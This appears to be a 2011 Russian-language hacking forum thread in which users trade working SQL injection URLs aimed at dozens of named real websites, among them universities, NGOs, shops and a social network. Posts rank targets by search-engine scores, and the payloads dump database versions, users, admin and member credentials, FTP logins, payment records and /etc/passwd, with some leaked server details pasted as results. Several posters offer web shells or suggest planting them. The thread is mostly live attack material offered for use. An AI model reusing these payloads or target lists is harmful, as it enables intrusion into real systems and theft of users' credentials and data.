http://www.microchip.by/info.php?id=-1106+union+select+1,2,3,version(),5--
http://www.gammabook.ru/news.php?id=-82+union+select+1,concat_ws(0x3a,id,name,password),3,4,5,6+from+users--
http://www.stinkyjournalism.org/editordetail.php?id=-671+union+select+1,concat_ws(0x3a,admin_id,admin_name,admin_pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+admin--
http://www.garo.cc/item.php?id=-879+union+select+1,2,version(),4,5,6,7,8,9,10,11,12
http://www.noborder.org/item.php?id=-383+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

позже выложу "сочные"

SergioRezza
10.06.2011, 09:32
http://adu.org.za/staff_page.php?staff_id=-31+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15--

http://www.jumbocast.net/staffdetails.php?staff_id=-2+union+select+1,2,3,version(),5,6,7,8,9,10,11--

http://www.milim.com/gallery.php?id=-163+union+select+1,version(),3,4--

AC//DC
10.06.2011, 11:57
http://www.r31-rabota.ru/index.php?id=-75%20and%201=2%20union%20select%201,2,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),4+--

5.1.54 r31-rabota@localhost r31-rabota portbld-freebsd8.1

winstrool
10.06.2011, 13:35
pr3 тиц 10

u73487@10.8.0.216:5.0.90-log:u73487

pr3 тиц 60

mospf_ru@zvm7.host.ru:5.0.92-log:mospf_ru

Melfis
10.06.2011, 19:37
http://www.antiquesincanada.com/shop.php?myID=-398 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23

http://www.lifesaving.org/image_shop_lrg.php?article_id=-41 union select 1,version()--+
Обязателен рефер с сайта.

http://www.karmavore.ca/shop.php?pcatid=7&cat=-87 union select version()--+

http://www.flyermall.com/community/msg_preview.html?cid=-15%20union%20select%201,version%28%29,3--+

SergioRezza
11.06.2011, 13:32
http://www.simbin.se/news.php?newsid=-153+union+select+1,concat_ws(0x3a,ID,USERNAME,PASSWORD),3,4,5+from+USERS+where+ID=15--

nemaniak
12.06.2011, 00:49
virtualjerusalem.com PR-7

http://www.virtualjerusalem.com/news.php?Itemid=3147+and+substring((select+version()),1,1)=5+--+

njsa.com PR-5

http://www.njsa.com/memoview.php?newsid=-194+union+select+1,2,3,4,concat_ws(version(),user(),database()),6,7,8,9,10+--+

70776_njsa@lnh-www1e.bluehalo.myregisteredsite.com5.0.7770776_njsa

bloodAngel
12.06.2011, 13:18
http://www.ashbyschool.org.uk/news/news_view.php?id=105-999.9+union+select+1,version%28%29,database%28%29,4,5,6,7,8--
4.1.22-log ashbyschooldb

Пр 4

http://www.javaportal.ru/books/aboutbook.php?id=30-999.9+union+select+1,database%28%29,version%28%29,4,5,6,7,8,9,10,11,12--
Тиц 100 Пр 4

http://www.globalfutureevents.com/event.php?id=-487+union+select+1,2,3,version(),database(),user(),7--

5.1.57 / fesu_db / fesu_usr@localhost
Тиц10 Пр 3

SergioRezza
12.06.2011, 14:58
http://colortek.by/show.php?id=434&t=-13+union+select+version()--

http://www.chgk.com.ru/person.php?id=-49+union+select+1,2,concat_ws(0x3a,name,pass),4,5,6,7+from+user--

http://lit.phil.pu.ru/person.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,name,password),8+from+users--

http://hotel-escort.ru/person.php?id=-59+union+select+1,2,3,4,version(),6,7--

http://www.mebelinfo.ru/base.php?tip=4&id=-34+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18--

http://fikomed.ru/base.php?id=-8+union+select+1,2,version(),4,5--

byte.catcher
12.06.2011, 18:26
http://www.riff-fanzine.com/InfoArticulo.php?idArticulo=63-999.9+union+select+1,version(),3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

SergioRezza
12.06.2011, 18:46
тИЦ 30
http://stairsoflove.ru/write.php?id=-36271+union+select+1,2,3,version(),5,6--

тИЦ 10
http://heartmir.ru/write.php?id=-360+union+select+1,version(),3,4,5--

тИЦ 30
http://moy-snegovik.ru/write.php?id=-11910+union+select+1,2,3,version(),5,6--

тИЦ 10
http://www.usadiba.ru/dom.php?id=-468+union+select+version(),2,3,4,5,6,7,8--

mix0x0
12.06.2011, 22:14
http://slanger.ru/?mode=library&sl_id=-1095+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables+--+
тИЦ: 30 PR: 3

foozzi
13.06.2011, 01:15
Вывод под датой
http://www.worstpreviews.com/headline.php?id=-16827+union+select+1,2,3,version(),5,6,7,8+--+

Не могу раскрутить
http://www.vizzed.com/vizzedboard/thread.php?id=4290'

CodeSender:)
14.06.2011, 08:09
http://tajik-gateway.org/index.phtml?lang=ru&id=-535+union+select+version(),2--+

http://kluchbulgaria.com/index.php?menu=12&lang=ru&id=1246+union+select+1,2,version(),4,5--+

http://stylink.ru/kolgotky/index.html?action=sl&id=5258+UnIon+selECt+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+

http://stroika.md/detail.php?id=1+UnIon+selECt+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+

http://tdlotos.com.ua/prod.php?id=-447+UnIon+selECt+1,concat_ws(0x3a,email,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users--+

http://russtyle-yug.ru/catalog.php?id=59302%27+union+select+concat_ws(0x3a,login,pass),2+from+tbl_users--+

http://prokatavto.com.ua/index.php?page=order&id=42+UnIon+selECt+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns+where+table_name=0x68636c5f6f70657261746f7273--+

http://julietta.com.ua/index.php?r=3&c=3&id=-84+union+select+version(),2--+

ubi
15.06.2011, 14:43
http://ulgaz.ru/index.php?mode=news&id=-184+union+select+concat_ws(0x3a,login,pass),2,3+from+users--+

Корпоративный сайт ООО "Ульяновскоблгаз"

попугай
16.06.2011, 00:34
semes@localhost:5.0.51a-24+lenny5





coma11@localhost:5.1.32-log:bdcoma11


tyeg@localhost:5.0.77:tyeg


his@localhost:4.0.21-log:tyh

Cennarios
16.06.2011, 05:31
http://ozone.unep.org/new_site/en/notes.php?country_id=1%29+union+select+1,2,unhex%28hex%28user%28%29%29%29--+

TYPUCT
16.06.2011, 18:15
http://www.mir-tv.ru/help.php?id=-2+UNION+SELECT+1,2,version%28%29,4--

5.1.41-log

http://www.position1.ru/index-1.php?id=-46+UNION+SELECT+1,2,3,version%28%29,5--

5.0.90

TYPUCT
16.06.2011, 18:31
тИЦ CY 80
PR 2

http://www.bolshie.ru/help.php?id=-4+union+select+1,2,3,4,version%28%29--

5.0.90-log

SergioRezza
18.06.2011, 12:49
http://www.elportal.ru/stat.php?id=-62+union+select+version()--

тИЦ 20

5.0.85-log

_________________________________

http://www.facebookcounter.ru/stat.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9--

5.0.91

________________________________

http://www.skladobzor.ru/stat.php?id=-23+union+select+version()--

тИЦ 10
5.0.85-log

_______________________________

http://www.pogruzchikservice.ru/index.php?t=stat&id=-4+union+select+version()--

тИЦ: 60

5.0.85-log
______________________________

http://www.itkt.ru/prod.php?id=-40+union+select+version()--

тИЦ: 40

4.1.25-log

Atarvala
18.06.2011, 15:56
http://penzlyk.com/biography.php?arts=10+and+1=0+union+select+concat_ws(0x3a3a3a,user(),database(),version())+--+

kravchluba_baza@localhost:::kravchluba_penzlyk:::5.0.67-community

kroŧ
18.06.2011, 18:27
http://www.plantdesignsolutions.com/news.php?id=12+uNiOn+all+seLeCT+1,2,3,COnCat_WS(0x3a,version(),user(),database()),5,6,7,8

5.0.91-log: : plantdesignusr@97.74.24.46: : plantdesignusr

http://www.ibis.dk/presse/showarticle.php?id=-4256++UnIoN+AlL+sElEcT+CONCAT_WS(CHAR(32,58,32),user(),database(),version())--

@localhost : ibis_web : 5.0.22-Debian_0ubuntu6.06.15-log

winstrool
18.06.2011, 21:20
тиц 30

5.0.91-community:captains_crush@localhost:captains_crush

pr2 тиц 20

medium-plus@localhost:5.0.77:medium-plus

pr4 тиц 140

itrexru@localhost:5.0.77:itrex_db


gumata_gumata@localhost:5.0.92-community:gumata_gumata

pr6 тиц 190

lab130@localhost:5.0.91-log:catalogue
FILE_PRIV=Y

pr4

ditcus@76.12.19.204:5.0.27-standard:ditcus

тиц:160 пр4

nukri2@localhost:4.1.18-standard:db_nukri2
уников в день 1500

pr5

cistudies@localhost:5.1.56-rs:cistudies

pr1

ycolasan_biz@localhost:5.1.54-log:ycolasan_biz.

pr5

bwcctest@204.13.10.22:aimstar_bwcccms:5.1.24-rc-log

pr3 тиц 30

zorro_svvm@localhost:zorro_svvm:5.0.51a-24+lenny4-log

Cennarios
19.06.2011, 02:31
http://www.iaea.org/nael/page.php?page=2125&recordID=-28/**//*!union*//**//*!select*//**/1,user%28%29,3,4,5,6,7,8,9,10--+

GroM88
19.06.2011, 03:26
http://stepstation.com/posts.php?category=-11+union+select+1,concat_ws(0x3a,email,password),3,4,5+from+users--
---
http://www.estatefiesolana.it/index.php?id=-597+union+select+1,concat_ws(0x3a,user,password),3,4,5+from+mysql.user--

winstrool
19.06.2011, 14:52
тиц 50

talasm01@localhost:5.1.56-log:wwwtalasmru_talasm01

тиц 10 pr2

akademiach@localhost:5.0.26-lk-log:akademiach

тиц 20

zubov@localhost:zubov517:5.0.67

тиц 40 pr3

itktru99_itkt@localhost:4.1.25-log:itktru99_itktru

mix0x0
20.06.2011, 00:33
http://topnexia.ru/arcticles.php?id=-41+union+select+1,version%28%29,3,4,5+--+
version: 5.0.26-log
database: allesistgu_nexia
user: allesistgu_nexia@localhost

тИЦ: 10 | pr: 1

http://studyincors.ru/country.php?id=-1+union+Select+1,concat_ws%280x3a3a,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+
version: 5.0.77-log
database: azanova_edu
user: azanova_edu@bitrix54.timeweb.ru

тИЦ: 0 | pr: 0

http://www.earthburg.ru/earthadm/php/process.php?lang=r&c1=10&id=-1+union+select+concat_ws%280x3a3a,version%28%29,database%28%29,user%28%29%29,2,3+--+
version: 5.0.92-log
database: earthbu6_earthburgnew
user: earthbu6_me@localhost

тИЦ: 50 | pr: 3

http://eti.stankin.ru/index.php?table=grcms_post_menu&id=-1+union+select+1,2,3,4,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29+--+
version: 5.1.28-rc
database: eti
user: eti@localhost

тИЦ: 10 | pr: 2

AC//DC
20.06.2011, 07:37
http://tatspirtprom.ru/production/catalog/balzami/balzami_30.html?template=-18%20and%201=2%20union%20select%201,2,3,4,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),6,7--

5.0.83 u01586_tsp_ru@localhost u01586_tsp_ru portbld-freebsd6.4

SergioRezza
20.06.2011, 11:35
http://www.cmbc.ru/process.php?ID=1%27%20AND%201%3D2+UNION+SELECT+version(),2,3+%23

тИЦ 110
PR 3

GroM88
20.06.2011, 13:46
http://in-green.com.ua/product_info.php?products_id=1124+and+0=1+union+select+version()--
5.0.51a-24+lenny4-log
тИЦ 50
PR 3
//Хеши и пароли запрещены!

vaddd
20.06.2011, 14:21
http://www.modflame.com/store.php?rid=-1+union+select+1,2,group_concat(email,':',password),4,5+from+users;+--+

SergioRezza
20.06.2011, 15:48
http://www.tennis-piter.ru/ban.php?id=-116+union+select+1,2,3,4,version()--

PR: 3
ТИЦ: 210

kroŧ
21.06.2011, 10:17
ip: 38.101.219.98
сайты на одном ip,
http://lurkingnoob.com/file.php?id=-76+UnIoN+ALL+SeLeCt+1,2,3,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),5,6,7
5.1.37-1ubuntu5.4-log:broorho@localhost:ringtones:debian-linux-gnu

http://omfgif.com/gif.php?id=-9999999+AND+1=0+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,load_file(0x2f6574632f706173737764),11,12--

http://mediafetcher.com/article_full.php?id=888888888888888+UnIoN+ALL+SeLeCt+1,2,3,4,5,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
5.1.37-1ubuntu5-log:uselessj_ohshitw@localhost:uselessj_uj2006:debian-linux-gnu

http://swagster.com/img.php?id=-242215+UnIoN+ALL+SeLeCt+1,2,3,4,5,6,7,version(),9,10,11,12
5.1.37-1ubuntu5.1-log

http://www.broorho.com/image.php?uid=-13381+UNION+SELECT+1,version(),3,4,5
5.1.37-1ubuntu5-log


TABLES

foozzi
21.06.2011, 15:29
Яндекс тИЦ 3400
Google PageRank 9/10

http://www.stanford.edu/group/spatialhistory/cgi-bin/site/page.php?id=-83+union+select+1,unhex(hex(table_name)),3+from+information_schema.tables+limit+41,9+--+



Яндекс тИЦ 10
Google PageRank 5/10

http://www.bispublishers.nl/bookpage.php?id=-142+union+select+1,2,concat_ws(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+users+--+

SergioRezza
21.06.2011, 22:18
http://www.apkhleb.ru/rus/press/news/?id=-1520+union+select+1,2,3,concat_ws(0x3a,id,login,pass,email),5,6,7,8+from+user+where+id=2--

PR: 4
ТИЦ: 450

http://www.konditerprom.ru/list/list.php?cid=-1+union+select+1,version()--

PR: 4
ТИЦ: 400

http://foodsmarket.info/wizard/view_unit.php?unit_num=1227%20%26%26%201%3D2%20UNION+SELECT+1,2,version(),4,5,6,7+%23

PR: 5
ТИЦ: 400

http://www.agromage.com/stat_id.php?id=782%27%20AND%201%3D2%20UNION%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%20%23

PR: 5
ТИЦ: 400

http://www.meatmarket.info/statinter.php?id=220%20%26%26%201%3D2+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10+%23

PR: 4
ТИЦ: 240

http://www.yuk.ru/site/index/news.php?id=10%27%20AND%201%3D2+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10+%23

PR: 2
ТИЦ: 180

я ни одну скьюлю не крутил, возможно где-то сможете залить шелы)))

vaddd
22.06.2011, 10:32
http://henryyanart.com/product.php?id=-100+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(id,txn_id,payment_amount,payment_currency,item_name,receiver_email,payer_email)+from+purchases

vaddd
22.06.2011, 10:51
http://floridashorestruckcenter.com/store/product.php?d=-100+union+select+1,2,3,4,5,6,7,group_concat(table_name)+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61

SergioRezza
22.06.2011, 11:14
http://www.vkf.ru/index.php?action=prod&type=detail&id=-391+union+select+1,2,3,4,version(),6,7,8,9,10,11--

PR: 3
ТИЦ: 170

http://www.1may.ru/news.php?p=27\'&n=35+and+1=2+union+select+version(),2,3--

PR: 3
ТИЦ: 130

http://www.ukrkonditer.kiev.ua/commerce/package_page.php?packid=89%20%26%26%201%3D2+UNION+SELECT+1,version(),3,4,5,6,7,8%23

PR: 4
ТИЦ: 200

http://www.dverifortrez.ru/view_item.php?id=-294+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--

PR: 4
ТИЦ: 600

http://www.lumstyle.ru/company/news.htm?news_id=-38+union+select+1,2,3,4,version(),6,7--

PR: 0
ТИЦ: 450

нужны шеллы? в лс

VDobridze
22.06.2011, 15:42
metuchenchamber.com
PR4
http://www.metuchenchamber.com/news.php?article=yes&id=-123%27%20union%20select%201,2,3,4,5,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,7,8,9,10,11%27

TYPUCT
23.06.2011, 06:34
holod_velesagro
5.1.45
holod_velesagro@localhost

http://www.velesagro.com/product.php?id=-129+union+select+1,2,3,database(),version(),user(),7,8,9,10,11,12,13,14,15,16,17,18,19,20--

PR: 2
ТИЦ: 40

vaddd
23.06.2011, 10:08
http://www.locosystech.com/product.php?id=-1+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61

тИц 10

BigBear
23.06.2011, 13:16
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(2),3,4,concat_ws(0x3a,user,pass),6,7,8+from+userlist+limit+0,1)--+1

GroM88
23.06.2011, 13:34
pr 2

Agel Nash
23.06.2011, 14:42
Смотреть title страниц

alerondel
24.06.2011, 13:25
http://www.crystalcityrestaurant.com/cmspages.php?id=-1+union+select+1,concat%28FName,0x3e,password%29,3++from+admin--

Melfis
25.06.2011, 13:03
http://www.bobandbarn.com/news/stories.php?id=-42+union+select+1,2,3,version(),5,6,7--+
http://www.rorkesdriftvc.com/discussion.php?topid=15168&forid=-1)+union+select+version()--+
http://www.morrisminorspares.net/shop_item.php?ID=-1936+union+select+1,2,3,version(),5,6,7,8,9,0,1,2,3,4--+
http://www.sport-shoes.ru/viewitem.php?num=(-312)union(select(1),2,version(),4,5,6,7,8,9,(10)from(information_schema.columns)where(table_name)='usersmin')--+

vaddd
26.06.2011, 09:02
http://www.vitecmultimedia.com/productv2.php?id=-1+union+select+1,2,3,4,5,6,version%28%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64

winstrool
26.06.2011, 21:12
user5293@localhost:5.0.91-community-log:user5293_xxxdrom


frs24ru@localhost:frs24ru:5.0.26-log


maybe_bboy@localhost:5.0.92-community:maybe_bboy

mix0x0
28.06.2011, 18:24
Агентура.Ru

слепая
http://www.agentura.ru/dossier/russia/fsb/?id=1307543520+and+%28SELECT+substring%28concat%281,password%29,1,1%29+from+bak_users+limit%200,1%29=1
тИЦ: 1300
PR: 5

Михаил Веллер официальный сайт
http://www.weller.ru/?id=22&cid=-7+union+select+1,pass,3,4,5+from+users+--+
админка: /users.php
тИЦ: 450
PR: 4

SergioRezza
28.06.2011, 21:55
http://www.advancedbiofuelsassociation.com/news.php?id=-72+union+select+1,concat_ws(0x3a,id,username,password,name,email),3,4,5,6,7,8,9,10,11+from+users+where+id=1--

PR: 4 ТИЦ: 0

--------------------------------------------------------------------

http://www.thetech.org/genetics/news.php?id=13%27%20AND%201%3D2%20UNION%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%20%23

PR: 7 ТИЦ: 100

Skofield
29.06.2011, 00:15
http://www.foroaeronautico.org/PHP/noticias.php?id=-221+union+select+1,2,3,4,version(),6,7,8,9,10--

Database Version: 5.0.77
Database name: qgp837
User name: qgp837@217.76.130.95

Cennarios
30.06.2011, 01:40
http://www.euroairport.com/FR/communiques.php?idcommunique=11512+union+select+1,unhex%28hex%28user%28%29%29%29,3,4,5,6,7,8,9,10,11,12,13--+

groupby
01.07.2011, 11:38
http://www.bikedekho.com/user-review/tvs-jive/dont-purchase_857-2%20AND%201=0%20UNION%20SELECT%20CONCAT%28%27%20%27,%20name,%20%27%20%27,%20pass,%20%27%20%27,%20mail,%20%27%20%27%29%20FROM%20users%20LIMIT%202,1.html

mix0x0
02.07.2011, 10:14
компании Микродата
http://www.microdata.odessa.ua/shop1/goods.php?id=-99+union+select+1,2,user,4,5,6,7,8,9+from+mysql.user--+

v: 4
тИЦ: 100 \ PR: 3

kroŧ
02.07.2011, 13:23
http://www.cheptelaleikoum.com/membre.php?id=-27+/*!UnIoN*/SeLeCT+1,2,3,4,5,6,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19--+
4.0.27-max-log:dbo209534058@212.227.114.140: db209534058: pc-linux-gnu

http://www.trip-hop.net/membre.php?id_membre=-1355+union+all+select+1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15
5.0.90-log:triphop5base@10.0.84.164:triphop5base: pc-linux-gnu

http://www.promotie.nl/promo.php?cat=-9+UnIoN+all+select+concat_ws(0x3a,@@version,user(),database()),2
5.0.91-community:deb8417_hps@localhost:deb8417_hps

KeyGanger
02.07.2011, 13:27
Tech Noir (Веб Дизайн)

http://www.tnoir.com/work.php?id=131+limit+0+union+select+1,group_concat(0x3c62723e,concat_ws(0x2e,table_schema,table_name,column_name)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns+where+column_name+like+0x2570617325

Яндекс тИЦ:20
Яндекс.Rank:2
Google PageRank:2/10

KeyGanger
02.07.2011, 14:03
http://life-prog.ru/view_linux.php?id=3'+limit+0+union+select+1,group_concat(0x3c62723e,concat_ws(0x207c20,login,password)),3,4+from+users+--+a

Яндекс тИЦ: 40
Яндекс Rank: 3/6
Google PageRank: 3/10

KeyGanger
03.07.2011, 14:59
Blind SQL injection

http://www.mybiz.ru/page.php?id=2+and+1=1 <-- true

http://www.mybiz.ru/page.php?id=2+and+1=2 <-- false


Яндекс тИЦ: 650
Google PageRank: 5/10

Один из сайтов компании gameland входит в пятёрку крупнейших российских издателей журналов, «Страна игр», «Хакер», «Хулиган»

foozzi
05.07.2011, 00:56
http://www.vize.cz/en/news.php?id=-348+union+select+1,2,3,4,5,version%28%29+--+


Вывод в тайтле
http://www.deafmissions.org/?PageID=-16+union+select+1,2,3,4,5,6,7,8,9,10,11,version%28%29+--+

Expl0ited
06.07.2011, 13:45
http://apps.facebook.com/sondaggi-fanpage/vote.php?id=(0)union(select(1),version(),3,4,5,6,7,8,9)--+
5.1.45-log

GroM88
07.07.2011, 14:24
http://www.webmobileshop.com/mobiledetails.php?mobileid=412+union+select+1,2,3,4,concat_ws(0x3a,username,password,email),6,7,8,9+from+alumni_admins+--+
PR 2
http://www.freshex.at/webshop/webshop.php?product_group=-4+union+select+version()+--+
PR 2
5.0.51a-24+lenny5

ZARO
07.07.2011, 15:25
http://www.mmorpg-servers.com/index.php?cat=RF+Online&qq=2.2.2'and(select/**/1/**/from(select/**/count(*),concat(version(),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)and'1'='1

version: 5.0.92-community
user: mmoserv_mmoserv
database: mmoserv_mmoservers

Вывод таблиц:
http://www.mmorpg-servers.com/index.php?cat=RF+Online&qq=2.2.2'and(select/**/1/**/from(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema!='information_schema'/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)and'1'='1

Osstudio
07.07.2011, 23:24
Интернет магазин книг.
http://www.tech-books.purput.ru/newsdetail.shtml?idnews=21+and+1=0+union+select+user%28%29,database%28%29,version%28%29--

bloodAngel
08.07.2011, 08:56
http://www.bard.edu/academics/additional/additional_pop.php?id=204042-999999+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14--
Тиц 90 Пр 7 , еду

bloodAngel
08.07.2011, 08:58
http://www.gs1.org/1/gtinrules/index.php/nid=1%20or%281,2%29=%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29

'5.0.51a-24+lenny5-log'

Тиц 90 Пр 7 ))))

SENIA
08.07.2011, 16:11
http://www.mtucizone.ru/teacher/list.htm?id=-12+union+select+1,2,concat_ws(0x3a,name,password),4+from+mtucizone.ibf_members--

SergioRezza
08.07.2011, 20:28
http://www.thefump.com/artist.php?id=11%20%26%26%201%3D2%20UNION%20SELECT+1,2,3,4,concat_ws(0x3a,id,username,password,email,paypal_email),6,7,8,9,10,11,12,13,14,15,16+from+users%23

расшифровывайте =)

mix0x0
09.07.2011, 02:10
конопляный ресурс
http://www.cannabisfunclub.com/chtivo/?news=-215+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14+--+

version: 5.0.51a-community
database: mrc_db2
user: mrc_db2@localhost

edge911
09.07.2011, 15:51
http://www.townoflakeshore.on.ca/lakeshore_1.php?page=-11(7 колонок)
5.0.67:
lakeshore@172.27.1.10:
lakeshore_lakeshore:
suse-linux-gnu
PR 4

http://www.lakeshore.ca/events.php?id=-722(5 колонок)
5.0.67:
lakeshore@172.27.1.10:
lakeshore_lakeshore:
suse-linux-gnu
PR 4

http://www.hawaii.edu/uhhbiology/index.php?page=person&id=-43(14 колонок)
4.1.20-standard-log:
uhhbiology@web41.pvt.hawaii.edu:
uhhbiology_d:sun-solaris2.8
PR 8

http://www.mycrysis.com/forums/memberlist.php?mode=viewprofile&u=679708%27
(ппц,phpbb 2007, mysqli(4.1++))
PR5

Bramin
09.07.2011, 22:23
http://www.gilcentr-sk.ru/?id=-22+union+select+1,2,3,4,5,version(),7,8,9--


http://busexplorer.com/PHP/FeaturePage.php?id=-22+union+select+1,group_concat(0x0b,table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables--


http://www.taliman-nsk.ru/?page=goodslist&id=-22+union+select+1,group_concat(0x0b,table_name)+from+information_schema.tables--

totenkopf
10.07.2011, 17:25
http://www.dalsouple.com/News.php?nid=2+and+0+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6+--+
http://www.easyfresh-logistics.com/news.php?nid=2'+and+0+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6+--+
http://www.globestravel.com/php/newsDetails.php?nid=2+and+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4+--+
http://www.greatecs.com/en/news/details.php?nid=2+and+0+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8+--+
http://www.midrma.com/News.php?nid=2+and+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4+--+
http://www.molecularpartners.com/tmp2.php?nid=2&sid=5&cid=12+and+0+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8+--+
http://www.music-powerhouse.com/news.php?nid=2'+and+0+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database())+--+
http://www.pacificwestsound.com/news.php?nid=2+and+0+UNION+SELECT+concat_ws(0x3a,user(),version(),database())+--+
http://www.pcgengr.com/news_detail.php?nid=2+and+0+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database())+--+
http://www.pickcells4pixels.com/index.php?nID=2+and+0+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),version(),database()),13,14+--+
http://www.portmeirion-village.com/content.php?nID=2;lID=1+and+0+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4+--+

d1v
10.07.2011, 21:17
Немного жира. :)

Московская торгово-промышленная палата. ТИЦ 1600 PR 5
http://www.mostpp.ru/news.php?id=-5805+union+select+concat_ws(0x3a,login,pass)+ from+users+limit+0,1
Имеем инъекцию с выводом в сорце:
<a href=/news.php?typ=><b>Вернуться к общему списку сообщений</b></a>
и как подобает подобным сайтам, с паролями в plaintext. :)


Ислам для всех. ТИЦ 850 PR 3
http://islam.com.ua/admin/modules/articles/print.php?nid=-1+union+select+1,2,3,4,version(),database(),7,8,9,10,user(),12,13
Имеем инъекцию в MySQL 4.1.25 с 3-мя принтабельными полями.


И на закуску - Социальная сеть с over 275к акками на борту.
http://www.33hochu.ru/likes.php?id=-122604'+or+1+group+by+concat((select+login+from+user+limit+275000,1),floor(rand(0)*2))having+min(0)+or+1--+
Имеем инъекцию с выводом в ошибке.

winstrool
10.07.2011, 21:33
pr 3 тиц 60

u58908@10.8.0.102:5.0.90-log:u58908

pr 2 тиц 10

u99856@78.108.84.161:5.0.90:b99856_nks24

pr 3 тиц 70

dbu_kovaldji_1@192.168.9.91:5.0.77-log:db_kovaldji_1

pr 2

lito@localhost:5.1.54-rel12.5-log:lito

Cennarios
11.07.2011, 17:17
www.zacks.com
PR 7

http://www.zacks.com/blog/archive.php?g=-6+union+select+1,2,version%28%29,4,5,6--+

Melfis
11.07.2011, 20:06
pr 3, тиц 70
http://www.i-watch.ru/?section=7&sid=-3+union+select+1,2,3,version(),5,6,7--+
5.0.51a-24+lenny4
___
пр: 4, тиц: 30
http://www.watch.su/search_cat.php?word=&start=1a&end=20a&where=1)and(select 1 from(select count(*),concat((select version()),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
5.0.33

GroM88
12.07.2011, 00:45
http://cluster2.space.swri.edu/article.php?id=-1+union+select+1,2,concat_ws(0x3a,user,password),4,5,6,7,8+from+mysql.user+--+
PR 4
http://www.thalictrum.com/index.php?pageid=6&artid=-6+union+select+1,concat_ws(0x3a,id,username,password),3,4,5,6,7,8,9,10,11,12+from+user+--+
4.1.20
PR 4
http://www.gp.org/press/pr-state.php?ID=-416'+union+select+version(),2,3,4,5,6+--+
5.0.45-log
тиЦ 30
PR 6
http://www.bdnews24.com/details.php?cid=10&id=-195068+union+select+1,2,concat_ws(0x3a,ftpurl,ftpuser,ftppass)+from+ftpsecure--Инфа выводится справа под блоком фейсбука ))
5.0.45-log

тИЦ 30
PR 5

http://www.africasia.com/africanbanker/afbnk.php?ID=-2356+union+select+version(),2,3,4,5,6,7,8,9,10+--+
5.0.84-log
тИЦ 50
PR 6

http://www.infovis.net/printMag.php?lang=2&num=-98+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13+--+
5.0.67-Max
тИЦ 10
PR 5